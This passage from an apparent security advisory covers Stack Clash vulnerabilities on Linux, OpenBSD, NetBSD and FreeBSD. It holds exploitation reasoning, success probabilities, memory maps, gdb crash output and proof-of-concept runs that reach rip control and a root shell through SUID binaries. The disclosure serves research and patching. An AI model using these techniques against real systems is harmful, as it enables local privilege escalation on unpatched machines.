that we initially\nthought it was impossible to clash the stack with another memory region;\nwe were wrong. \n\nLinux\u0027s execve() first randomizes the end of the mmap region (which\ngrows top-down by default) and then randomizes the end of the stack\nregion (which grows down, on x86). On amd64, the initial mmap-stack\ndistance (between the end of the mmap region and the end of the stack\nregion) is minimal when RLIMIT_STACK is lower than or equal to MIN_GAP\n(mmap_base() in arch/x86/mm/mmap.c), and then:\n\n- the end of the mmap region is equal to (as calculated by\n arch_pick_mmap_layout() in arch/x86/mm/mmap.c):\n\n mmap_end = TASK_SIZE - MIN_GAP - arch_mmap_rnd()\n\n where:\n\n . TASK_SIZE is the highest address of the user-space (0x7ffffffff000)\n\n . MIN_GAP = 128MB + stack_maxrandom_size()\n\n . stack_maxrandom_size() is ~16GB (or ~4GB if the kernel is vulnerable\n to CVE-2015-1593, but we do not consider this case here)\n\n . arch_mmap_rnd() is a random variable in the [0B,1TB] range\n\n- the end of the stack region is equal to (as calculated by\n randomize_stack_top() in fs/binfmt_elf.c):\n\n stack_end = TASK_SIZE - \"stack_rand\"\n\n where:\n\n . \"stack_rand\" is a random variable in the [0, stack_maxrandom_size()]\n range\n\n- the initial mmap-stack distance is therefore equal to:\n\n stack_end - mmap_end = MIN_GAP + arch_mmap_rnd() - \"stack_rand\"\n\n = 128MB + stack_maxrandom_size() - \"stack_rand\" + arch_mmap_rnd()\n\n = 128MB + StackRand + MmapRand\n\n where:\n\n . StackRand = stack_maxrandom_size() - \"stack_rand\", a random variable\n in the [0B,16GB] range\n\n . MmapRand = arch_mmap_rnd(), a random variable in the [0B,1TB] range\n\nConsequently, the minimum initial mmap-stack distance is only 128MB\n(CVE-2017-1000379), and:\n\n- On kernels vulnerable to offset2lib, the heap of a PIE (which is\n mapped at the end of the mmap region) is mapped below and close to the\n stack with a good probability (~1/700). We can therefore clash the\n stack with the heap in Step 1, jump over the stack guard-page and into\n the heap in Step 3, and smash the stack with the heap and gain control\n of rip in Step 4a (after 6 hours on average). However, because the\n addresses of all executable regions contain null-bytes, and because\n most of our stack-smashes in Step 4a are string operations (except the\n getaddrinfo() method), we were unable to transform such a rip control\n into arbitrary code execution. \n\n- On all kernels, either a PIE or ld.so is mapped directly below the\n stack with a good probability (~1/17000) -- the end of the PIE\u0027s or\n ld.so\u0027s read-write segment is then equal to the start of the stack\n guard-page. We can therefore adapt our ld.so \"hwcap\" exploit to amd64\n and obtain root privileges through most SUID binaries on most Linux\n distributions (after 5 hours on average). \n\nKernels vulnerable to offset2lib, local Exim proof-of-concept\n\nExim\u0027s binary is usually a PIE, mapped at the end of the mmap region;\nand the heap, which always grows up and is randomized above the end of\nthe binary, is therefore randomized above the end of the mmap region\n(arch_randomize_brk() in arch/x86/kernel/process.c):\n\n heap_start = mmap_end + \"heap_rand\"\n\nwhere \"heap_rand\" is a random variable in the [0B,32MB] range\n(negligible and ignored here). For example, on Debian 8.5:\n\n# cat /proc/\"`pidof -s /usr/sbin/exim4`\"/maps\n... \n7fa6410d6000-7fa6411c8000 r-xp 00000000 08:01 14574 /usr/sbin/exim4\n7fa6413b4000-7fa6413bd000 rw-p 00000000 00:00 0\n7fa6413c5000-7fa6413c7000 rw-p 00000000 00:00 0\n7fa6413c7000-7fa6413c9000 r--p 000f1000 08:01 14574 /usr/sbin/exim4\n7fa6413c9000-7fa6413d2000 rw-p 000f3000 08:01 14574 /usr/sbin/exim4\n7fa6413d2000-7fa6413d7000 rw-p 00000000 00:00 0\n7fa641b34000-7fa641b76000 rw-p 00000000 00:00 0 [heap]\n7ffdf3e53000-7ffdf3ed6000 rw-p 00000000 00:00 0 [stack]\n7ffdf3f3c000-7ffdf3f3e000 r-xp 00000000 00:00 0 [vdso]\n7ffdf3f3e000-7ffdf3f40000 r--p 00000000 00:00 0 [vvar]\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\n\nTo reach the start of the stack with the end of the heap (through the -p\nmemory leak in Exim) in Step 1 of our stack-clash, we must minimize the\ninitial heap-stack distance, and hence the initial mmap-stack distance,\nand set RLIMIT_STACK to MIN_GAP (~16GB). This limits the size of our -p\nargument strings on the stack to 16GB/4=4GB, and because we then leak\nthe same amount of heap memory through -p, the initial heap-stack\ndistance must be:\n\n- longer than 4GB (the stack must be able to contain the -p argument\n strings);\n\n- shorter than 8GB (the end of the heap must be able to reach the start\n of the stack during the -p memory leak). \n\nThe initial heap-stack distance (approximately the initial mmap-stack\ndistance, 128MB + StackRand + MmapRand, but we ignore the 128MB term\nhere) follows a trapezoidal Irwin-Hall distribution, and the [4GB,8GB]\nrange is within the first non-uniform area of this trapezoid, so the\nprobability that the initial heap-stack distance is in this range is:\n\n SUM(d = 4GB; d \u003c 8GB; d++) d / (16GB * 1TB)\n\n = SUM(d = 0; d \u003c 4GB; d++) (4GB + d) / (16GB * 1TB)\n\n = SUM(d = 0; d \u003c 2^32; d++) (2^32 + d) / (2^34 * 2^40)\n\n ~= ((2^32)*(2^32) + (2^32)*(2^32) / 2) / (2^74)\n\n ~= 3 / 2^11\n\n ~= 1 / 682\n\nThe probability of gaining rip control after the heap reaches the stack\nis ~1/16 (as calculated by a 64-bit version of the small helper program\npresented in IV.1.1.), and the final probability of gaining rip control\nwith our local Exim proof-of-concept is:\n\n (3 / 2^11) * (1/16) ~= 1 / 10922\n\nOn our 8GB Debian 8.7 test machine, this proof-of-concept takes roughly\n2 seconds per run, and has a good chance of gaining rip control after\n10922 * 2 seconds ~= 6 hours:\n\n# gdb /usr/sbin/exim4 core.6049\nGNU gdb (Debian 7.7.1+dfsg-5) 7.7.1\n... \nThis GDB was configured as \"x86_64-linux-gnu\". \nCore was generated by `/usr/sbin/exim4 -p0000000000000000000000000000000000000000000000000000000000000\u0027. \nProgram terminated with signal SIGSEGV, Segmentation fault. \n#0 __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:41\n41 ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory. \n(gdb) x/i $rip\n=\u003e 0x7ffab1be7061 \u003c__memcpy_sse2_unaligned+65\u003e: retq\n(gdb) x/xg $rsp\n0x7ffb9b294a48: 0x4141414141414141\n\nKernels vulnerable to offset2lib, ld.so \".dynamic\" exploit\n\nSince kernels vulnerable to offset2lib map PIEs below and close to the\nstack, we tried to adapt our ld.so \".dynamic\" exploit to amd64. MIN_GAP\nguarantees a minimum distance of 128MB between the theoretical end of\nthe mmap region and the end of the stack, but the stack then grows down\nto store the argument and environment strings, and may therefore occupy\nthe theoretical end of the mmap region (where nothing has been mapped\nyet). Consequently, the end of the mmap region (where the PIE will be\nmapped) slides down to the first available address, directly below the\nstack guard-page and the initial stack expansion (described in II.3.2.):\n\n7ffbb7e51000-7ffbb7e53000 r-xp 00000000 fd:03 4465810 /tmp/test64\n... \n7ffbb8053000-7ffbb808c000 rw-p 00002000 fd:03 4465810 /tmp/test64\n7ffbb808d000-7ffc180ae000 rw-p 00000000 00:00 0 [heap]\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\n\nNote: in this example, the \"[stack]\" is, again, incorrectly displayed as\nthe \"[heap]\" by show_map_vma() (in fs/proc/task_mmu.c). \n\nThis layout is ideal for our stack-clash exploits, but poses an\nunexpected problem: because the PIE is mapped directly below the stack,\nthe stack cannot grow anymore, and the only free stack space is the\ninitial stack expansion (128KB) minus the argv[] and envp[] pointers\n(which are stored there, as mentioned in II.3.2.):\n\n- on the one hand, many argv[] and envp[] pointers, and hence many\n argument and environment strings, result in a higher probability of\n mapping the PIE directly below the stack;\n\n- on the other hand, many argv[] and envp[] pointers consume most of the\n initial stack expansion and do not leave enough free stack space for\n ld.so to operate. \n\nIn practice, we pass 96KB of argv[] pointers to execve(), thus leaving\n32KB of free stack space for ld.so, and since the size of a pointer is\n8B, and the maximum size of an argument string is 128KB, we also pass\n96KB/8B*128KB=1.5GB of argument strings to execve(). The resulting\nprobability of mapping the PIE directly below the stack is:\n\n SUM(s = 0; s \u003c 1.5GB - 128MB; s++) s / (16GB * 1TB)\n\n ~= ((1.5GB - 128MB)^2 / 2) / (16GB * 1TB)\n\n ~= 1 / 17331\n\nOn a 4GB Virtual Machine, each run takes 1 second, and 17331 runs take\nroughly 5 hours. But we cannot add more uncertainty to this exploit, and\nbecause of the problems discussed in IV.1.4. (null-bytes in DT_NEEDED,\nbut also in DT_AUXILIARY on 64-bit, etc), we were unable to overwrite\nthe .dynamic section with a pattern that does not significantly decrease\nthis exploit\u0027s probability of success. \n\nAll kernels, ld.so \"hwcap\" exploit\n\nDespite this failure, we had an intuition: when the PIE is mapped\ndirectly below the stack, the stack layout should be deterministic --\nrsp should point into the 128KB of initial stack expansion, at a 32KB\noffset above the start of the stack, and the only entropy should be the\n8KB of sub-page randomization within the stack (arch_align_stack() in\narch/x86/kernel/process.c). The following output of our small test\nprogram confirmed this intuition (the fourth field is the distance\nbetween the start of the stack and our main()\u0027s rsp when the PIE is\nmapped directly below the stack):\n\n$ grep -w sp test64.out | sort -nk4\nsp 0x7ffbc271ff38 -\u003e 28472\nsp 0x7ffbb95ccff8 -\u003e 28664\nsp 0x7ffbaf062678 -\u003e 30328\nsp 0x7ffbb08736e8 -\u003e 30440\nsp 0x7ffbbc616d18 -\u003e 32024\nsp 0x7ffbc1a0fdb8 -\u003e 32184\nsp 0x7ffbb9c28ff8 -\u003e 32760\nsp 0x7ffbdbf4c178 -\u003e 33144\nsp 0x7ffbb39bc1c8 -\u003e 33224\nsp 0x7ffbebb86838 -\u003e 34872\n\nSurprisingly, the output of this test program contained additional\nvaluable information:\n\n7ffbb7e51000-7ffbb7e53000 r-xp 00000000 fd:03 4465810 /tmp/test64\n7ffbb8034000-7ffbb8037000 rw-p 00000000 00:00 0\n7ffbb804d000-7ffbb804e000 rw-p 00000000 00:00 0\n7ffbb804e000-7ffbb8050000 r--p 00000000 00:00 0 [vvar]\n7ffbb8050000-7ffbb8052000 r-xp 00000000 00:00 0 [vdso]\n7ffbb8052000-7ffbb8053000 r--p 00001000 fd:03 4465810 /tmp/test64\n7ffbb8053000-7ffbb808c000 rw-p 00002000 fd:03 4465810 /tmp/test64\n7ffbb808d000-7ffc180ae000 rw-p 00000000 00:00 0 [heap]\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\n\n- the distance between the end of the read-execute segment of our test\n program and the start of its read-only and read-write segments is\n approximately 2MB; indeed, for every ELF on amd64:\n\n$ readelf -a /usr/bin/su | grep -wA1 LOAD\n LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000\n 0x00000000000061b4 0x00000000000061b4 R E 200000\n LOAD 0x0000000000006888 0x0000000000206888 0x0000000000206888\n 0x0000000000000798 0x00000000000007d0 RW 200000\n\n$ readelf -a /lib64/ld-linux-x86-64.so.2 | grep -wA1 LOAD\n LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000\n 0x000000000001fad0 0x000000000001fad0 R E 200000\n LOAD 0x000000000001fb60 0x000000000021fb60 0x000000000021fb60\n 0x000000000000141c 0x00000000000015e8 RW 200000\n\n- several objects are actually mapped inside this ~2MB hole: [vdso],\n [vvar], and two anonymous mappings (7ffbb804d000-7ffbb804e000 and\n 7ffbb8034000-7ffbb8037000). \n\nThis discovery allowed us to adapt our ld.so \"hwcap\" exploit to amd64:\n\n- we choose hardware-capabilities that are small enough to be mapped\n inside this ~2MB hole, but large enough to defeat the 8KB sub-page\n randomization of the stack;\n\n- we jump over the stack guard-page, and over the read-only and\n read-write segments of the PIE, and exploit ld.so as we did on i386. \n\nThis exploit\u0027s probability of success is therefore 1 when the PIE is\nmapped directly below the stack, and its final probability of success is\n~1/17331: it takes 1 second per run, and has a good chance of obtaining\na root-shell after 5 hours. Moreover, it works on all kernels: if a SUID\nbinary is not a PIE, or if the kernel is not vulnerable to offset2lib,\nwe simply jump over ld.so\u0027s read-write segment, instead of the PIE\u0027s. \nFor example, on Fedora 25, when the exploit succeeds and loads our own\nlibrary /var/tmp/a (the 7ffbabbef000-7ffbabca7000 mapping contains the\nhardware-capabilities that we smash):\n\n55a0c9e8d000-55a0c9e91000 r-xp 00000000 fd:00 112767 /usr/libexec/cockpit-polkit\n55a0ca091000-55a0ca093000 rw-p 00004000 fd:00 112767 /usr/libexec/cockpit-polkit\n7ffbab603000-7ffbab604000 r-xp 00000000 fd:00 4866583 /var/tmp/a\n7ffbab604000-7ffbab803000 ---p 00001000 fd:00 4866583 /var/tmp/a\n7ffbab803000-7ffbab804000 r--p 00000000 fd:00 4866583 /var/tmp/a\n7ffbab804000-7ffbaba86000 rw-p 00000000 00:00 0\n7ffbaba86000-7ffbabaab000 r-xp 00000000 fd:00 4229637 /usr/lib64/ld-2.24.so\n7ffbabbef000-7ffbabca7000 rw-p 00000000 00:00 0\n7ffbabca7000-7ffbabca9000 r--p 00000000 00:00 0 [vvar]\n7ffbabca9000-7ffbabcab000 r-xp 00000000 00:00 0 [vdso]\n7ffbabcab000-7ffbabcad000 rw-p 00025000 fd:00 4229637 /usr/lib64/ld-2.24.so\n7ffbabcad000-7ffbabcae000 rw-p 00000000 00:00 0\n7ffbabcaf000-7ffc0bcf0000 rw-p 00000000 00:00 0 [stack]\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\n\n========================================================================\nIV.2. OpenBSD\n========================================================================\n\n========================================================================\nIV.2.1. Maximum RLIMIT_STACK vulnerability (CVE-2017-1000372)\n========================================================================\n\nThe OpenBSD kernel limits the maximum size of the user-space stack\n(RLIMIT_STACK) to MAXSSIZ (32MB); the execve() system-call allocates a\nMAXSSIZ memory region for the stack and divides it in two:\n\n- the second part, effectively the user-space stack, is mapped\n PROT_READ|PROT_WRITE at the end of this stack memory region, and\n occupies RLIMIT_STACK bytes (by default 8MB for root processes, and\n 4MB for user processes);\n\n- the first part, effectively a large stack guard-page, is mapped\n PROT_NONE at the start of this stack memory region, and occupies\n MAXSSIZ - RLIMIT_STACK bytes. \n\nUnfortunately, we discovered that if an attacker sets RLIMIT_STACK to\nMAXSSIZ, he eliminates the PROT_NONE part of the stack region, and hence\nthe stack guard-page itself (CVE-2017-1000372). For example:\n\n# sh -c \u0027ulimit -S -s; procmap -a -P\u0027\n8192\nStart End Size Offset rwxpc RWX I/W/A Dev Inode - File\n... \n14cf6000-14cfafff 20k 00000000 r-xp+ (rwx) 1/0/0 00:03 52375 - /usr/sbin/procmap [0xdb29ce10]\n... \n84a7b000-84a7bfff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]\ncd7db000-cefdafff 24576k 00000000 ---p+ (rwx) 1/0/0 00:00 0 - [ stack ]\ncefdb000-cf7cffff 8148k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]\ncf7d0000-cf7dafff 44k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]\n total 10348k\n\n# sh -c \u0027ulimit -S -s `ulimit -H -s`; procmap -a -P\u0027\nStart End Size Offset rwxpc RWX I/W/A Dev Inode - File\n... \n1a47f000-1a483fff 20k 00000000 r-xp+ (rwx) 1/0/0 00:03 52375 - /usr/sbin/procmap [0xdb29ce10]\n... \n8a3c8000-8a3c9fff 8k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]\ncd7c9000-cf7bffff 32732k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]\ncf7c0000-cf7c8fff 36k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]\n total 33992k\n\nA remote attacker cannot exploit this vulnerability, because he cannot\nmodify RLIMIT_STACK; but a local attacker can set RLIMIT_STACK to\nMAXSSIZ, and:\n\n- Step 1: malloc()ate almost 2GB of heap memory, until the heap reaches\n the start of the stack region;\n\n- Steps 2 and 3: consume MAXSSIZ (32MB) of stack memory, until the\n stack-pointer reaches the start of the stack region (Step 2) and moves\n into the heap (Step 3);\n\n- Step 4: smash the stack with the heap (Step 4a) or smash the heap with\n the stack (Step 4b). \n\n========================================================================\nIV.2.2. Recursive qsort() vulnerability (CVE-2017-1000373)\n========================================================================\n\nTo complete Step 2, a recursive function is needed, and the first\npossibly recursive function that we investigated is qsort(). On the one\nhand, glibc\u0027s _quicksort() function (in stdlib/qsort.c) is non-recursive\n(iterative): it uses a small, specialized stack of partition structures\n(two pointers, low and high), and guarantees that no more than 32\npartitions (on i386) or 64 partitions (on amd64) are pushed onto this\nstack, because it always pushes the larger of two sub-partitions and\niterates on the smaller partition. \n\nOn the other hand, BSD\u0027s qsort() function is recursive: it always\nrecurses on the first sub-partition, and iterates on the second\nsub-partition; but instead, it should always recurse on the smaller\nsub-partition, and iterate on the larger sub-partition (CVE-2017-1000373\nin OpenBSD, CVE-2017-1000378 in NetBSD, and CVE-2017-1082 in FreeBSD). \n\nIn theory, because BSD\u0027s qsort() is not randomized, an attacker can\nconstruct a pathological input array of N elements that causes qsort()\nto deterministically recurse N times. In practice, because this qsort()\nuses the median-of-three medians-of-three selection of a pivot element\n(the \"ninther\"), our attack constructs an input array of N elements that\ncauses qsort() to recurse N/4 times. \n\n========================================================================\nIV.2.3. /usr/bin/at proof-of-concept\n========================================================================\n\n/usr/bin/at is SGID-crontab (which can be escalated to full root\nprivileges) because it must be able to create (\"at -t\"), list (\"at -l\"),\nand remove (\"at -r\") job-files in the /var/cron/atjobs directory:\n\n-r-xr-sr-x 4 root crontab 31376 Jul 26 2016 /usr/bin/at\ndrwxrwx--T 2 root crontab 512 Jul 26 2016 /var/cron/atjobs\n\nTo demonstrate that OpenBSD\u0027s RLIMIT_STACK and qsort() vulnerabilities\ncan be transformed into powerful primitives such as heap corruption, we\ndeveloped a proof-of-concept against \"at -l\" (the list_jobs() function):\n\n- Step 1 (Clash): first, list_jobs() malloc()ates an atjob structure for\n each file in /var/cron/atjobs -- if we create 40M job-files, then the\n heap reaches the stack, but we do not exhaust the address-space;\n\n- Steps 2 and 3 (Run and Jump): second, list_jobs() qsort()s the\n malloc()ated jobs -- if we construct their time-stamps with our\n qsort() attack, then we can cause qsort() to recurse 40M/4=10M times\n and consume at least 10M*4B=40MB of stack memory (each recursive call\n to qsort() consumes at least 4B, the return-address) and move the\n stack-pointer into the heap;\n\n- Step 4b (Smash the heap with the stack): last, list_jobs() free()s the\n malloc()ated jobs, and abort()s with an error message -- OpenBSD\u0027s\n hardened malloc() implementation detects that the heap has been\n corrupted by the last recursive calls to qsort(). \n\nThis naive version of our /usr/bin/at proof-of-concept poses two major\nproblems:\n\n- Our pathological input array of N=40M elements cannot be sorted (Step\n 2 never finishes because it exhibits qsort()\u0027s worst-case behavior,\n N^2). To solve this problem, we divide the input array in two:\n\n . the first, pathological part contains only n=(33MB/176B)*4=768K\n elements that are needed to complete Steps 2 and 3, and cause\n qsort() to recurse n/4 times and consume (n/4)*176B=33MB of stack\n memory (MAXSSIZ+1MB) as each recursive call to qsort() consumes 176B\n of stack memory;\n\n . the second, innocuous part contains the remaining N-n=39M elements\n that are needed to complete Step 1, but not Steps 2 and 3, and are\n therefore swapped into the second, iterative partition of the first\n recursive call to qsort(). \n\n- We were unable to create 40M files in /var/cron/atjobs: after one\n week, OpenBSD\u0027s default filesystem (ffs) had created only 4M files,\n and the rate of file creation had dropped from 25 files/second to 4\n files/second. We did not solve this problem, but nevertheless wanted\n to validate our proof-of-concept:\n\n . we transformed it into an LD_PRELOAD library that intercepts calls\n to readdir() and fstatat(), and pretends that our 40M files in\n /var/cron/atjobs exist;\n\n . we made /var/cron/atjobs world-readable and LD_PRELOADed our library\n into a non-SGID copy of /usr/bin/at;\n\n . after about an hour, \"at\" reports random heap corruptions:\n\n# chmod o+r /var/cron/atjobs\n# chmod o+r /var/cron/at.deny\n\n$ ulimit -c 0\n$ ulimit -S -d `ulimit -H -d`\n$ ulimit -S -s `ulimit -H -s`\n$ ulimit -S -a\n... \ncoredump(blocks) 0\ndata(kbytes) 3145728\nstack(kbytes) 32768\n... \n$ cp /usr/bin/at . \n\n$ LD_PRELOAD=./OpenBSD_at.so ./at -l -v -q x \u003e /dev/null\ninitializing jobkeys\nfinalizing jobkeys\nreading jobs\n10%\n20%\n30%\n40%\n50%\n60%\n70%\n80%\n90%\n100%\nsorting jobs\nat(78717) in free(): error: chunk info corrupted\nAbort trap\n\n$ LD_PRELOAD=./OpenBSD_at.so ./at -l -v -q x \u003e /dev/null\ninitializing jobkeys\nfinalizing jobkeys\nreading jobs\n10%\n20%\n30%\n40%\n50%\n60%\n70%\n80%\n90%\n100%\nsorting jobs\nat(14184) in free(): error: modified chunk-pointer 0xcd6d0120\nAbort trap\n\n========================================================================\nIV.3. NetBSD\n========================================================================\n\nLike OpenBSD, NetBSD is vulnerable to the maximum RLIMIT_STACK\nvulnerability (CVE-2017-1000374): if a local attacker sets RLIMIT_STACK\nto MAXSSIZ, he eliminates the PROT_NONE part of the stack region -- the\nstack guard-page itself. Unlike OpenBSD, however, NetBSD:\n\n- defines MAXSSIZ to 64MB on i386 (128MB on amd64);\n\n- maps the run-time link-editor ld.so directly below the stack region,\n even if ASLR is enabled (CVE-2017-1000375):\n\n$ sh -c \u0027ulimit -S -s; pmap -a -P\u0027\n2048\nStart End Size Offset rwxpc RWX I/W/A Dev Inode - File\n08048000-0804dfff 24k 00000000 r-xp+ (rwx) 1/0/0 00:00 21706 - /usr/bin/pmap [0xc5c8f0b8]\n... \nbbbee000-bbbfefff 68k 00000000 r-xp+ (rwx) 1/0/0 00:00 107525 - /libexec/ld.elf_so [0xc535f580]\nbbbff000-bbbfffff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]\nbbc00000-bf9fffff 63488k 00000000 ---p+ (rwx) 1/0/0 00:00 0 - [ stack ]\nbfa00000-bfbeffff 1984k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]\nbfbf0000-bfbfffff 64k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]\n total 9528k\n\n$ sh -c \u0027ulimit -S -s `ulimit -H -s`; pmap -a -P\u0027\nStart End Size Offset rwxpc RWX I/W/A Dev Inode - File\n08048000-0804dfff 24k 00000000 r-xp+ (rwx) 1/0/0 00:00 21706 - /usr/bin/pmap [0xc5c8f0b8]\n... \nbbbee000-bbbfefff 68k 00000000 r-xp+ (rwx) 1/0/0 00:00 107525 - /libexec/ld.elf_so [0xc535f580]\nbbbff000-bbbfffff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]\nbbc00000-bfbeffff 65472k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]\nbfbf0000-bfbfffff 64k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]\n total 73016k\n\n# cp /usr/bin/pmap . \n# paxctl +A ./pmap\n# sh -c \u0027ulimit -S -s `ulimit -H -s`; ./pmap -a -P\u0027\nStart End Size Offset rwxpc RWX I/W/A Dev Inode - File\n08048000-0804dfff 24k 00000000 r-xp+ (rwx) 1/0/0 00:00 172149 - /tmp/pmap [0xc5cb3c64]\n... \nbbbee000-bbbfefff 68k 00000000 r-xp+ (rwx) 1/0/0 00:00 107525 - /libexec/ld.elf_so [0xc535f580]\nbbbff000-bbbfffff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]\nbbc00000-bf1bffff 55040k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]\nbf1c0000-bf1cefff 60k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]\n total 62580k\n\nConsequently, a local attacker can set RLIMIT_STACK to MAXSSIZ,\neliminate the stack guard-page, and:\n\n- skip Step 1, because ld.so\u0027s read-write segment is naturally mapped\n directly below the stack region;\n\n- Steps 2 and 3: consume 64MB (MAXSSIZ) of stack memory (for example,\n through the recursive qsort() vulnerability, CVE-2017-1000378) until\n the stack-pointer reaches the start of the stack region (Step 2) and\n moves into ld.so\u0027s read-write segment (Step 3);\n\n- Step 4b: smash ld.so\u0027s read-write segment with the stack. \n\nWe did not try to exploit this vulnerability, nor did we search for a\nvulnerable SUID or SGID binary, but we wrote a simple proof-of-concept,\nand some of the following crashes may be exploitable:\n\n$ sh -c \u0027ulimit -S -s `ulimit -H -s`; ./NetBSD_CVE-2017-1000375 0x04000000\u0027\n[1] Segmentation fault ./NetBSD_CVE-201... \n\n$ sh -c \u0027ulimit -S -s `ulimit -H -s`; ./NetBSD_CVE-2017-1000375 0x03000000\u0027\n\n... \n\n$ sh -c \u0027ulimit -S -s `ulimit -H -s`; ./NetBSD_CVE-2017-1000375 0x03ec5000\u0027\n\n$ sh -c \u0027ulimit -S -s `ulimit -H -s`; ./NetBSD_CVE-2017-1000375 0x03ec5400\u0027\n[1] Segmentation fault ./NetBSD_CVE-201... \n\n$ sh -c \u0027ulimit -S -s `ulimit -H -s`; gdb ./NetBSD_CVE-2017-1000375\u0027\nGNU gdb (GDB) 7.7.1\n... \n(gdb) run 0x03ec5400\nProgram received signal SIGSEGV, Segmentation fault. \n0xbbbf448d in _rtld_symlook_default () from /usr/libexec/ld.elf_so\n(gdb) x/i $eip\n=\u003e 0xbbbf448d \u003c_rtld_symlook_default+185\u003e: mov %edx,(%esi,%edi,4)\n(gdb) info registers\nesi 0xbabae890 -1162155888\nedi 0x0 0\n... \n(gdb) run 0x03ec5800\nProgram received signal SIGSEGV, Segmentation fault. \n0xbbbf4465 in _rtld_symlook_default () from /usr/libexec/ld.elf_so\n(gdb) x/i $eip\n=\u003e 0xbbbf4465 \u003c_rtld_symlook_default+145\u003e: mov 0x4(%ecx),%edx\n(gdb) info registers\necx 0x41414141 1094795585\n... \n(gdb) run 0x03ec5c00\nProgram received signal SIGSEGV, Segmentation fault. \n0xbbbf4408 in _rtld_symlook_default () from /usr/libexec/ld.elf_so\n(gdb) x/i $eip\n=\u003e 0xbbbf4408 \u003c_rtld_symlook_default+52\u003e: mov (%eax),%esi\n(gdb) info registers\neax 0x41414141 1094795585\n... \n\n========================================================================\nIV.4. FreeBSD\n========================================================================\n\n========================================================================\nIV.4.1. setrlimit() RLIMIT_STACK vulnerability (CVE-2017-1085)\n========================================================================\n\nFreeBSD\u0027s kern_proc_setrlimit() function contains the following comment\nand code:\n\n /*\n * Stack is allocated to the max at exec time with only\n * \"rlim_cur\" bytes accessible. If stack limit is going\n * up make more accessible, if going down make inaccessible. \n */\n if (limp-\u003erlim_cur != oldssiz.rlim_cur) {\n ... \n if (limp-\u003erlim_cur \u003e oldssiz.rlim_cur) {\n prot = p-\u003ep_sysent-\u003esv_stackprot;\n size = limp-\u003erlim_cur - oldssiz.rlim_cur;\n addr = p-\u003ep_sysent-\u003esv_usrstack -\n limp-\u003erlim_cur;\n } else {\n prot = VM_PROT_NONE;\n size = oldssiz.rlim_cur - limp-\u003erlim_cur;\n addr = p-\u003ep_sysent-\u003esv_usrstack -\n oldssiz.rlim_cur;\n }\n ... \n (void)vm_map_protect(\u0026p-\u003ep_vmspace-\u003evm_map,\n addr, addr + size, prot, FALSE);\n }\n\nOpenBSD\u0027s and NetBSD\u0027s dosetrlimit() function contains the same comment,\nwhich accurately describes the layout of their user-space stack region. \nUnfortunately, FreeBSD\u0027s kern_proc_setrlimit() comment and code are\nincorrect, as hinted at in exec_new_vmspace():\n\n/*\n * Destroy old address space, and allocate a new stack\n * The new stack is only SGROWSIZ large because it is grown\n * automatically in trap.c. \n */\n\nand vm_map_stack_locked():\n\n /*\n * We initially map a stack of only init_ssize. We will grow as\n * needed later. \n\nwhere init_ssize is SGROWSIZ (128KB), not MAXSSIZ (64MB on i386),\nbecause \"init_ssize = (max_ssize \u003c growsize) ? max_ssize : growsize;\"\n(and max_ssize is MAXSSIZ, and growsize is SGROWSIZ). \n\nAs a result, if a program calls setrlimit() to increase RLIMIT_STACK,\nvm_map_protect() may turn a read-only memory region below the stack into\na read-write region (CVE-2017-1085), as demonstrated by the following\nproof-of-concept:\n\n% ./FreeBSD_CVE-2017-1085\nSegmentation fault\n\n% ./FreeBSD_CVE-2017-1085 setrlimit to the max\nchar at 0xbd155000: 41\n\n========================================================================\nIV.4.2. Stack guard-page disabled by default (CVE-2017-1083)\n========================================================================\n\nThe FreeBSD kernel implements a 4KB stack guard-page, and recent\nversions of the FreeBSD Installer offer it as a system hardening option. \nUnfortunately, it is disabled by default (CVE-2017-1083):\n\n% sysctl security.bsd.stack_guard_page\nsecurity.bsd.stack_guard_page: 0\n\n========================================================================\nIV.4.3. Stack guard-page vulnerabilities (CVE-2017-1084)\n========================================================================\n\n- If FreeBSD\u0027s stack guard-page is enabled, its entire logic is\n implemented in vm_map_growstack(): this function guarantees a minimum\n distance of 4KB (the stack guard-page) between the start of the stack\n and the end of the memory region that is mapped below (but the stack\n guard-page is not physically mapped into the address-space). \n\n Unfortunately, this guarantee is given only when the stack grows down\n and clashes with the memory region mapped below, but not if the memory\n region mapped below grows up and clashes with the stack: this\n vulnerability effectively eliminates the stack guard-page\n (CVE-2017-1084). In our proof-of-concept:\n\n . we allocate anonymous mmap()s of 4KB, until the end of an anonymous\n mmap() reaches the start of the stack [Step 1];\n\n . we call a recursive function until the stack-pointer reaches the\n start of the stack and moves into the anonymous mmap() directly\n below [Step 2];\n\n . but we do not jump over the stack guard-page, because each call to\n the recursive function allocates (and fully writes to) a 1KB\n stack-based buffer [Step 3];\n\n . and we do not crash into the stack guard-page, because CVE-2017-1084\n has effectively eliminated the stack guard-page in Step 1. \n\n# sysctl security.bsd.stack_guard_page=1\nsecurity.bsd.stack_guard_page: 0 -\u003e 1\n\n% ./FreeBSD_CVE-2017-FGPU\nchar at 0xbfbde000: 41\n\n- vm_map_growstack() implements most of the stack guard-page logic in\n the following code:\n\n /*\n * Growing downward. \n */\n /* Get the preliminary new entry start value */\n addr = 